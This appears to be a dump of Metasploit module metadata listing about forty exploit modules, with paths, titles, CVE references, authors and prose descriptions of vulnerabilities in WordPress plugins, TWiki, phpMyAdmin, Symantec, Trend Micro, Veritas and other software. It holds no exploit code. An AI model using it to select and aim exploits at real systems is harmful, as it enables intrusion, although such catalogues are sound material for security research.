293,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_include.rb","exploit","unix/webapp/php_include","exploit/unix/webapp/php_include","PHP Remote File Include Generic Code Execution",300,"This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: ","Metasploit Framework License (BSD)","f","2006-12-17 00:00:00",0,,"aggressive","t",,"egypt , ethicalhack3r, hdm " 294,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_vbulletin_template.rb","exploit","unix/webapp/php_vbulletin_template","exploit/unix/webapp/php_vbulletin_template","vBulletin misc.php Template Name Arbitrary Code Execution",600,"This module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the ""Add Template Name in HTML Comments"" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.","BSD License","f","2005-02-25 00:00:00",0,,"aggressive","t","BID-12622, CVE-2005-0511, OSVDB-14047","cazz , str0ke " 295,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_wordpress_foxypress.rb","exploit","unix/webapp/php_wordpress_foxypress","exploit/unix/webapp/php_wordpress_foxypress","WordPress plugin Foxypress uploadify.php Arbitrary Code Execution",600,"This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plug-in versions 0.4.2.1 and below are vulnerable.","Metasploit Framework License (BSD)","f","2012-06-05 00:00:00",0,,"aggressive","t","BID-53805, EDB-18991, OSVDB-82652","Sammy FORGIT, patrick " 296,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_wordpress_lastpost.rb","exploit","unix/webapp/php_wordpress_lastpost","exploit/unix/webapp/php_wordpress_lastpost","WordPress cache_lastpostdate Arbitrary Code Execution",600,"This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software. This vulnerability is only present when the PHP 'register_globals' option is enabled (common for hosting providers). All versions of WordPress prior to 1.5.1.3 are affected.","Metasploit Framework License (BSD)","f","2005-08-09 00:00:00",0,,"aggressive","t","BID-14533, CVE-2005-2612, OSVDB-18672","hdm , str0ke " 297,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_wordpress_total_cache.rb","exploit","unix/webapp/php_wordpress_total_cache","exploit/unix/webapp/php_wordpress_total_cache","Wordpress W3 Total Cache PHP Code Execution",600,"This module exploits a PHP Code Injection vulnerability against Wordpress plugin W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older is also reported as vulnerable. The vulnerability is due to the handling of certain macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is needed in order to add the malicious comment. If the POSTID option isn't specified, then the module will automatically bruteforce one. Also, if anonymous comments aren't allowed, then a valid username and password must be provided. In addition, the ""A comment is held for moderation"" option on Wordpress must be unchecked for successful exploitation. This module has been tested against Wordpress 3.5 and W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.","Metasploit Framework License (BSD)","f","2013-04-17 00:00:00",0,,"aggressive","t","BID-59316, OSVDB-92652, URL-http://wordpress.org/support/topic/pwn3d, URL-http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/","Christian Mehlmauer, Unknown, hdm , juan vazquez " 298,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_xmlrpc_eval.rb","exploit","unix/webapp/php_xmlrpc_eval","exploit/unix/webapp/php_xmlrpc_eval","PHP XML-RPC Arbitrary Code Execution",600,"This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.","Metasploit Framework License (BSD)","f","2005-06-29 00:00:00",0,,"aggressive","t","BID-14088, CVE-2005-1921, OSVDB-17793","cazz , hdm " 299,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/phpbb_highlight.rb","exploit","unix/webapp/phpbb_highlight","exploit/unix/webapp/phpbb_highlight","phpBB viewtopic.php Arbitrary Code Execution",600,"This module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace(). This vulnerability was introduced in revision 3076, and finally fixed in revision 5166. According to the ""tags"" within their tree, this corresponds to versions 2.0.4 through 2.0.15 (inclusive).","Metasploit Framework License (BSD)","f","2004-11-12 00:00:00",0,,"aggressive","t","BID-10701, BID-14086, CVE-2004-1315, CVE-2005-2086, OSVDB-11719, OSVDB-17613","hdm , patrick , valsmith " 300,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/phpmyadmin_config.rb","exploit","unix/webapp/phpmyadmin_config","exploit/unix/webapp/phpmyadmin_config","PhpMyAdmin Config File Code Injection",600,"This module exploits a vulnerability in PhpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. The file where our payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"aggressive","t","CVE-2009-1151, EDB-8921, OSVDB-53076, URL-http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/, URL-http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php","Greg Ose, egypt , pagvac" 301,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/projectpier_upload_exec.rb","exploit","unix/webapp/projectpier_upload_exec","exploit/unix/webapp/projectpier_upload_exec","Project Pier Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability found in Project Pier. The application's uploading tool does not require any authentication, which allows a malicious user to upload an arbitrary file onto the web server, and then cause remote code execution by simply requesting it. This module is known to work against Apache servers due to the way it handles an extension name, but the vulnerability may not be exploitable on others.","Metasploit Framework License (BSD)","f","2012-10-08 00:00:00",0,,"aggressive","t","EDB-21929, OSVDB-85881, URL-http://packetstormsecurity.org/files/117070/ProjectPier-0.8.8-Shell-Upload.html","BlackHawk, sinn3r " 302,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb","exploit","unix/webapp/qtss_parse_xml_exec","exploit/unix/webapp/qtss_parse_xml_exec","QuickTime Streaming Server parse_xml.cgi Remote Execution",600,"The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allow arbitrary commands to be executed as root.","Metasploit Framework License (BSD)","t","2003-02-24 00:00:00",0,,"aggressive","t","BID-6954, CVE-2003-0050, OSVDB-10562","hdm " 303,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/redmine_scm_exec.rb","exploit","unix/webapp/redmine_scm_exec","exploit/unix/webapp/redmine_scm_exec","Redmine SCM Repository Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Redmine repository controller. The flaw is triggered when a rev parameter is passed to the command line of the SCM tool without adequate filtering.","Metasploit Framework License (BSD)","f","2010-12-19 00:00:00",0,,"aggressive","t","CVE-2011-4929, OSVDB-70090, URL-http://www.redmine.org/news/49","joernchen " 304,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/sphpblog_file_upload.rb","exploit","unix/webapp/sphpblog_file_upload","exploit/unix/webapp/sphpblog_file_upload","Simple PHP Blog <= 0.4.0 Remote Command Execution",600,"This module combines three separate issues within The Simple PHP Blog (<= 0.4.0) application to upload arbitrary data and thus execute a shell. The first vulnerability exposes the hash file (password.txt) to unauthenticated users. The second vulnerability lies within the image upload system provided to logged-in users; there is no image validation function in the blogger to prevent an authenticated user from uploading any file type. The third vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted.","Metasploit Framework License (BSD)","f","2005-08-25 00:00:00",0,,"aggressive","t","BID-14667, CVE-2005-2733, EDB-1191, OSVDB-19012","Matteo Cantoni , patrick " 305,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb","exploit","unix/webapp/squirrelmail_pgp_plugin","exploit/unix/webapp/squirrelmail_pgp_plugin","SquirrelMail PGP Plugin command execution (SMTP)",0,"This module exploits a command execution vulnerability in the PGP plugin of SquirrelMail. This flaw was found while quickly grepping the code after release of some information at http://www.wslabi.com/. Later, iDefense published an advisory .... Reading an email in SquirrelMail with the PGP plugin activated is enough to compromise the underlying server. Only ""cmd/unix/generic"" payloads were tested.","Metasploit Framework License (BSD)","f","2007-07-09 00:00:00",0,,"passive","t","CVE-2003-0990, OSVDB-3178, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330, URL-http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html, URL-http://www.wslabi.com/wabisabilabi/initPublishedBid.do?","Nicob " 306,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb","exploit","unix/webapp/sugarcrm_unserialize_exec","exploit/unix/webapp/sugarcrm_unserialize_exec","SugarCRM <= 6.3.1 unserialize() PHP Code Execution",600,"This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1 which could be abused to allow authenticated SugarCRM users to execute arbitrary code with the permissions of the webserver. The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php' script, which is called with user controlled data from the 'current_query_by_page' parameter. The exploit abuses the __destruct() method from the SugarTheme class to write arbitrary PHP code to a 'pathCache.php' on the web root.","Metasploit Framework License (BSD)","f","2012-06-23 00:00:00",0,,"aggressive","t","CVE-2012-0694, EDB-19381, URL-http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/","EgiX, juan vazquez , sinn3r " 307,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb","exploit","unix/webapp/tikiwiki_graph_formula_exec","exploit/unix/webapp/tikiwiki_graph_formula_exec","TikiWiki tiki-graph_formula Remote PHP Code Execution",600,"TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.","Metasploit Framework License (BSD)","f","2007-10-10 00:00:00",0,,"aggressive","t","BID-26006, CVE-2007-5423, OSVDB-40478","Matteo Cantoni , jduck " 308,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb","exploit","unix/webapp/tikiwiki_jhot_exec","exploit/unix/webapp/tikiwiki_jhot_exec","TikiWiki jhot Remote Command Execution",600,"TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a loss of integrity. The vulnerability was reported in Tikiwiki version 1.9.4.","Metasploit Framework License (BSD)","f","2006-09-02 00:00:00",0,,"aggressive","t","BID-19819, CVE-2006-4602, OSVDB-28456, URL-http://secunia.com/advisories/21733/","Matteo Cantoni " 309,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb","exploit","unix/webapp/tikiwiki_unserialize_exec","exploit/unix/webapp/tikiwiki_unserialize_exec","Tiki Wiki <= 8.3 unserialize() PHP Code Execution",600,"This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the webserver user. The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script, which is called with user controlled data from the 'printpages' parameter. The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy class to write arbitrary PHP code to a file on the Tiki Wiki web directory. In order to run successfully three conditions must be satisfied (1) display_errors php setting must be On to disclose the filesystem path of Tiki Wiki, (2) The Tiki Wiki Multiprint feature must be enabled to exploit the unserialize() and (3) a php version older than 5.3.4 must be used to allow poison null bytes in filesystem related functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.","Metasploit Framework License (BSD)","f","2012-07-04 00:00:00",0,,"aggressive","t","BID-54298, CVE-2012-0911, EDB-19573, OSVDB-83534, URL-http://dev.tiki.org/item4109","EgiX, juan vazquez " 310,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/trixbox_langchoice.rb","exploit","unix/webapp/trixbox_langchoice","exploit/unix/webapp/trixbox_langchoice","Trixbox langChoice PHP Local File Inclusion",0,"This module injects php into the trixbox session file and then, in a second call, evaluates that code by manipulating the langChoice parameter as described in OSVDB-50421.","Metasploit Framework License (BSD)","f","2008-07-09 00:00:00",0,,"aggressive","t","BID-30135, CVE-2008-6825, EDB-6026, OSVDB-50421, URL-http://www.trixbox.org/","chao-mu" 311,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/twiki_history.rb","exploit","unix/webapp/twiki_history","exploit/unix/webapp/twiki_history","TWiki History TWikiUsers rev Parameter Command Execution",600,"This module exploits a vulnerability in the history component of TWiki. By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.","Metasploit Framework License (BSD)","t","2005-09-14 00:00:00",0,,"aggressive","t","BID-14834, CVE-2005-2877, OSVDB-19403, URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev","B4dP4nd4, jduck " 312,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/twiki_maketext.rb","exploit","unix/webapp/twiki_maketext","exploit/unix/webapp/twiki_maketext","TWiki MAKETEXT Remote Command Execution",600,"This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since user input is passed to the Perl ""eval"" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. This works in TWiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set). If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random page on the SandBox space. The modules has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.","Metasploit Framework License (BSD)","f","2012-12-15 00:00:00",0,,"aggressive","t","BID-56950, CVE-2012-6329, OSVDB-88460, URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329","George Clark, juan vazquez " 313,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/twiki_search.rb","exploit","unix/webapp/twiki_search","exploit/unix/webapp/twiki_search","TWiki Search Function Arbitrary Command Execution",600,"This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands.","Metasploit Framework License (BSD)","t","2004-10-01 00:00:00",0,,"aggressive","t","BID-11674, CVE-2004-1037, OSVDB-11714, URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch","jduck " 314,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb","exploit","unix/webapp/webmin_show_cgi_exec","exploit/unix/webapp/webmin_show_cgi_exec","Webmin /file/show.cgi Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in Webmin 1.580. The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary commands with root privileges. The module has been tested successfully with Webim 1.580 over Ubuntu 10.04.","Metasploit Framework License (BSD)","t","2012-09-06 00:00:00",0,,"aggressive","t","BID-55446, CVE-2012-2982, OSVDB-85248, URL-http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf, URL-https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213","Unknown, juan vazquez " 315,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb","exploit","unix/webapp/wp_advanced_custom_fields_exec","exploit/unix/webapp/wp_advanced_custom_fields_exec","WordPress Plugin Advanced Custom Fields Remote File Inclusion",600,"This module exploits a remote file inclusion flaw in the WordPress blogging software plugin known as Advanced Custom Fields. The vulnerability allows for remote file inclusion and remote code execution via the export.php script. The Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only works when the php option allow_url_include is set to On (Default Off).","Metasploit Framework License (BSD)","f","2012-11-14 00:00:00",0,,"aggressive","t","OSVDB-87353, URL-http://secunia.com/advisories/51037/","Charlie Eriksen " 316,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb","exploit","unix/webapp/wp_asset_manager_upload_exec","exploit/unix/webapp/wp_asset_manager_upload_exec","WordPress Asset-Manager PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress plugin. By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-05-26 00:00:00",0,,"aggressive","t","BID-53809, EDB-18993, OSVDB-82653, URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html","James Fitts , Sammy FORGIT" 317,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb","exploit","unix/webapp/wp_google_document_embedder_exec","exploit/unix/webapp/wp_google_document_embedder_exec","WordPress Plugin Google Document Embedder Arbitrary File Disclosure",300,"This module exploits an arbitrary file disclosure flaw in the WordPress blogging software plugin known as Google Document Embedder. The vulnerability allows for database credential disclosure via the /libs/pdf.php script. The Google Document Embedder plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL server is exposed on a accessible IP and Wordpress has filesystem write access. Please note: The admin password may get changed if the exploit does not run to the end.","Metasploit Framework License (BSD)","f","2013-01-03 00:00:00",0,,"aggressive","t","CVE-2012-4915, OSVDB-88891, URL-http://secunia.com/advisories/50832","Charlie Eriksen" 318,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/wp_property_upload_exec.rb","exploit","unix/webapp/wp_property_upload_exec","exploit/unix/webapp/wp_property_upload_exec","WordPress WP-Property PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-03-26 00:00:00",0,,"aggressive","t","BID-53787, EDB-18987, OSVDB-82656, URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html","James Fitts , Sammy FORGIT" 319,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/xoda_file_upload.rb","exploit","unix/webapp/xoda_file_upload","exploit/unix/webapp/xoda_file_upload","XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",600,"This module exploits a file upload vulnerability found in XODA 0.4.5. Attackers can abuse the ""upload"" command in order to upload a malicious PHP file without any authentication, which results in arbitrary code execution. The module has been tested successfully on XODA 0.4.5 and Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2012-08-21 00:00:00",0,,"aggressive","t","BID-55127, EDB-20703, OSVDB-85117","Shai rod, juan vazquez " 320,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb","exploit","unix/webapp/zoneminder_packagecontrol_exec","exploit/unix/webapp/zoneminder_packagecontrol_exec","ZoneMinder Video Server packageControl Command Execution",600,"This module exploits a command execution vulnerability in ZoneMinder Video Server version 1.24.0 to 1.25.0 which could be abused to allow authenticated users to execute arbitrary commands under the context of the web server user. The 'packageControl' function in the 'includes/actions.php' file calls 'exec()' with user controlled data from the 'runState' parameter.","Metasploit Framework License (BSD)","t","2013-01-22 00:00:00",0,,"aggressive","t","URL-http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/","Brendan Coles " 321,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/ams_hndlrsvc.rb","exploit","windows/antivirus/ams_hndlrsvc","exploit/windows/antivirus/ams_hndlrsvc","Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",600,"Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","t","2010-07-26 00:00:00",0,,"aggressive","t","BID-41959, OSVDB-66807, URL-http://www.foofus.net/~spider/code/AMS2_072610.txt","MC " 322,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/ams_xfr.rb","exploit","windows/antivirus/ams_xfr","exploit/windows/antivirus/ams_xfr","Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution",600,"Symantec System Center Alert Management System is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","t","2009-04-28 00:00:00",0,,"aggressive","t","BID-34671, CVE-2009-1429, OSVDB-54157, URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-060/","MC " 323,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/symantec_iao.rb","exploit","windows/antivirus/symantec_iao","exploit/windows/antivirus/symantec_iao","Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",400,"This module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe. When an attacker sends a specially crafted alert, arbitrary code may be executed.","Metasploit Framework License (BSD)","t","2009-04-28 00:00:00",0,,"aggressive","t","BID-34674, CVE-2009-1430, OSVDB-54159","MC " 324,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/symantec_rtvscan.rb","exploit","windows/antivirus/symantec_rtvscan","exploit/windows/antivirus/symantec_rtvscan","Symantec Remote Management Buffer Overflow",400,"This module exploits a stack buffer overflow in Symantec Client Security 3.0.x. This module has only been tested against Symantec Client Security 3.0.2 build 10.0.2.2000.","Metasploit Framework License (BSD)","t","2006-05-24 00:00:00",0,,"aggressive","t","BID-18107, CVE-2006-2630, OSVDB-25846, URL-http://research.eeye.com/html/advisories/published/AD20060612.html","MC " 325,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb","exploit","windows/antivirus/trendmicro_serverprotect","exploit/windows/antivirus/trendmicro_serverprotect","Trend Micro ServerProtect 5.58 Buffer Overflow",400,"This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-02-20 00:00:00",0,,"aggressive","t","BID-22639, CVE-2007-1070, OSVDB-33042","MC " 326,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb","exploit","windows/antivirus/trendmicro_serverprotect_createbinding","exploit/windows/antivirus/trendmicro_serverprotect_createbinding","Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",400,"This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-05-07 00:00:00",0,,"aggressive","t","BID-23868, CVE-2007-2508, OSVDB-35790","MC " 327,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb","exploit","windows/antivirus/trendmicro_serverprotect_earthagent","exploit/windows/antivirus/trendmicro_serverprotect_earthagent","Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",400,"This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060 EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-05-07 00:00:00",0,,"aggressive","t","BID-23866, CVE-2007-2508, OSVDB-35789","MC " 328,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/arkeia/type77.rb","exploit","windows/arkeia/type77","exploit/windows/arkeia/type77","Arkeia Backup Client Type 77 Overflow (Win32)",400,"This module exploits a stack buffer overflow in the Arkeia backup client for the Windows platform. This vulnerability affects all versions up to and including 5.3.3.","Metasploit Framework License (BSD)","t","2005-02-18 00:00:00",0,,"aggressive","t","BID-12594, CVE-2005-0491, OSVDB-14011, URL-http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html","hdm " 329,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/backdoor/energizer_duo_payload.rb","exploit","windows/backdoor/energizer_duo_payload","exploit/windows/backdoor/energizer_duo_payload","Energizer DUO Trojan Code Execution",600,"This module will execute an arbitrary payload against any system infected with the Arugizer trojan horse. This backdoor was shipped with the software package accompanying the Energizer Duo USB battery charger.","Metasploit Framework License (BSD)","f","2010-03-05 00:00:00",0,,"aggressive","t","CVE-2010-0103, OSVDB-62782, US-CERT-VU-154421","hdm " 330,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/backupexec/name_service.rb","exploit","windows/backupexec/name_service","exploit/windows/backupexec/name_service","Veritas Backup Exec Name Service Overflow",200,"This module exploits a vulnerability in the Veritas Backup Exec Agent Browser service. This vulnerability occurs when a recv() call has a length value too long for the destination stack buffer. By sending an agent name value of 63 bytes or more, we can overwrite the return address of the recv function. Since we only have ~60 bytes of contiguous space for shellcode, a tiny findsock payload is sent which uses a hardcoded IAT address for the recv() function. This payload will then roll the stack back to the beginning of the page, recv() the real shellcode into it, and jump to it. This module has been tested against Veritas 9.1 SP0, 9.1 SP1, and 8.6.","Metasploit Framework License (BSD)","t","2004-12-16 00:00:00",0,,"aggressive","t","BID-11974, CVE-2004-1172, OSVDB-12418, URL-http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities","hdm " 331,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/backupexec/remote_agent.rb","exploit","windows/backupexec/remote_agent","exploit/windows/backupexec/remote_agent","Veritas Backup Exec Windows Remote Agent Overflow",500,"This module exploits a stack buffer overflow in the Veritas BackupExec Windows Agent software. This vulnerability occurs when a client authentication request is received with type '3' and a long password argument. Reliable execution is obtained by abusing the stack buffer overflow to smash a SEH pointer.","Metasploit Framework License (BSD)","t","2005-06-22 00:00:00",0,,"aggressive","t","BID-14022, CVE-2005-0773, OSVDB-17624, URL-http://seer.support.veritas.com/docs/276604.htm, URL-http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities","hdm " 332,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/ca_arcserve_342.rb","exploit","windows/brightstor/ca_arcserve_342","exploit/windows/brightstor/ca_arcserve_342","Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow",200,"This module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884). By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need set the hostname argument (HNAME).","Metasploit Framework License (BSD)","t","2008-10-09 00:00:00",0,,"aggressive","t","BID-31684, CVE-2008-4397, OSVDB-49468, URL-http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html","MC , Nahuel Cayento Riva" 333,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/discovery_tcp.rb","exploit","windows/brightstor/discovery_tcp","exploit/windows/brightstor/discovery_tcp","CA BrightStor Discovery Service TCP Overflow",200,"This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic[at]gmx.net and affects all known versions of the BrightStor product. This module is based on the 'cabrightstor_disco' exploit by HD Moore.","Metasploit Framework License (BSD)","t","2005-02-14 00:00:00",1,,"aggressive","t","BID-12536, CVE-2005-2535, EDB-1131, OSVDB-13814, URL-http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html","hdm , patrick " 334,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/discovery_udp.rb","exploit","windows/brightstor/discovery_udp","exploit/windows/brightstor/discovery_udp","CA BrightStor Discovery Service Stack Buffer Overflow",200,"This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack buffer overflow.","Metasploit Framework License (BSD)","t","2004-12-20 00:00:00",0,,"aggressive","t","BID-12491, CVE-2005-0260, OSVDB-13613, URL-http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities","hdm , patrick " 335,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/etrust_itm_alert.rb","exploit","windows/brightstor/etrust_itm_alert","exploit/windows/brightstor/etrust_itm_alert","Computer Associates Alert Notification Buffer Overflow",200,"This module exploits a 